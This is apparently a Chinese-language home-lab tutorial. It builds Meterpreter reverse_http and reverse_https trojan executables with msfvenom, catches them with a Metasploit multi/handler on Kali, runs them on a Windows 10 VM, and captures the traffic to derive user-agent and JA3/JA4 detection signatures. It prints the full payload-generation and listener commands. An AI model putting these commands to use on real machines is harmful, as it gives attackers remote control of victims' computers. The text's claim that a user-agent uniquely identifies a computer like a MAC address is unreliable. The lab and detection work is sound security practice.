一、准备工作
作者本人是一台win10和kali虚拟机
1.调制同一网段
我们把它均放在自定义方式中的VMnet8中
对win10
对kali(由于作者本身虚拟机中kali界面太小所以使用真实机通过ssh服务进行连接演示,若大家有需求可以出一篇如何ssh连接kali)
二、操作阶段
1.对kali
(1)制作木马
msfconsole
进行msf6模式
http后门:
msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.13.135 lport=8899 -f exe -o 8899.exe
https后门:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.13.135 lport=9988 -f exe -o 9988.exe
(2)使用exploit/multi/handler模块进行入侵
http:
并且使用options命令查看所需设置的内容,为本机ip:192.168.13.135和监听端口port:8899
https:(将lport改成9988即可)
设置payload
set payload windows/x64/meterpreter/reverse_http
set payload windows/x64/meterpreter/reverse_https(后续监听https时改变)
2.对win10
将两个木马放进win10
3.入侵
(1)对http
在入侵前先开启我们的抓包软件wireshark监听vmnet8网卡
(此处包为ssh服务所发忽略我们关注192.168.13.135与192.168.13.136的通信)
kali先执行run操作,win10点击8899.exe
成功后抓包
抓包后发现user-agent一致所以可以作为强规则写入(user-agent类似mac地址,是电脑的唯一标识,意味着拒绝此u
ser-agent的通信)
(2)https
修改对应参数
启动
成功后抓包
记录ja3和ja4值(client端由于使用者不同大家也各不相同根据自己的而改变)